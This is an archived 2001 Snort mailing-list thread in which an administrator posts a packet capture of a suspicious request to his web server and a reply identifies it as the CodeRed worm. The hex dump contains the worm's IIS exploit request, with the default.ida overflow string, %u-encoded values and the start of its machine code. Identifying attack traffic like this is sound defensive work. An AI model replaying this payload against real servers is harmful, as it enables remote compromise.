Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: help with packet trace

From: Ryan Russell <ryan () securityfocus com>
Date: Thu, 19 Jul 2001 16:17:24 -0600 (MDT)
That's the CodeRed worm.  Check out the incidents list for a current
discussion:

http://securityfocus.com/templates/archive.pike?list=75



                                Ryan

On Thu, 19 Jul 2001, Robert L. Yelvington wrote:


I searched whitehats.com and rolled snake eyes...can someone provide some
insight into this...I'd be glad to discuss this off the list if needed:

07/19-16:25:05.718583 foreign_IP:2633 -> myserver_IP:80
TCP TTL:255 TOS:0x0 ID:0 IpLen:20 DgmLen:1116
***AP*** Seq: 0x0  Ack: 0x0  Win: 0x0  TcpLen: 20
54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 3F 4E  T /default.ida?N
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 25  NNNNNNNNNNNNNNN%
75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64  u9090%u6858%ucbd
33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36  3%u7801%u9090%u6
38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25  858%ucbd3%u7801%
75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64  u9090%u6858%ucbd
33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 39  3%u7801%u9090%u9
30 39 30 25 75 38 31 39 30 25 75 30 30 63 33 25  090%u8190%u00c3%
75 30 30 30 33 25 75 38 62 30 30 25 75 35 33 31  u0003%u8b00%u531
62 25 75 35 33 66 66 25 75 30 30 37 38 25 75 30  b%u53ff%u0078%u0
30 30 30 25 75 30 30 3D 61 20 20 48 54 54 50 2F  000%u00=a  HTTP/
31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70  1.0..Content-typ
65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F 53 54  e: text/xml.HOST
3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A 20 41  :www.worm.com. A
63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E 74 65  ccept: */*.Conte
6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 39 20  nt-length: 3569
0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53 56 57  ....U........SVW
8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC CC CC  ................
F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A 0B 00  ....p...........

thanks a bunch!

~rob


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users




_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Previous By Date Next
Previous By Thread Next

Current thread: